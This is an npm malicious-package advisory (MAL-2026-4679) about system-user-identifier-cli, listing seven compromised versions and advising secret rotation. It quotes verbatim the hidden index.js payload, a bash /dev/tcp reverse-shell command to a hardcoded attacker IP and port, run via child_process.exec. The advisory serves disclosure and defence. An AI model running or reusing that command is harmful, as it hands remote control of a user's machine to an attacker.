npm · Malicious package advisory
Malwaresystem-user-identifier-cli
MAL-2026-4679
Malicious code in system-user-identifier-cli (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8)
index.js line 13 executes `bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"` via child_process.exec, opening an interactive reverse shell to the hardcoded attacker-controlled host 101.43.232.7 on TCP port 7777. The shell fires whenever the package's entrypoint is invoked (e.g. `npx system-user-identifier-cli` or require of the module), giving the operator of that endpoint full interactive control of the installer's machine under the user that ran the tool. The package advertises itself as a trivial 'check system user identifier' utility and ships placeholder author metadata ('Your Name'); the reverse shell is undocumented and inconsistent with the stated purpose. There is no benign interpretation of a hardcoded `/dev/tcp/<ip>/<port>` bash redirector pointed at an arbitrary public IP.
Compromised versions (7)
- 3.0.0
- 7.0.1
- 6.0.0
- 2.0.0
- 4.0.0
- 7.0.0
- 5.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.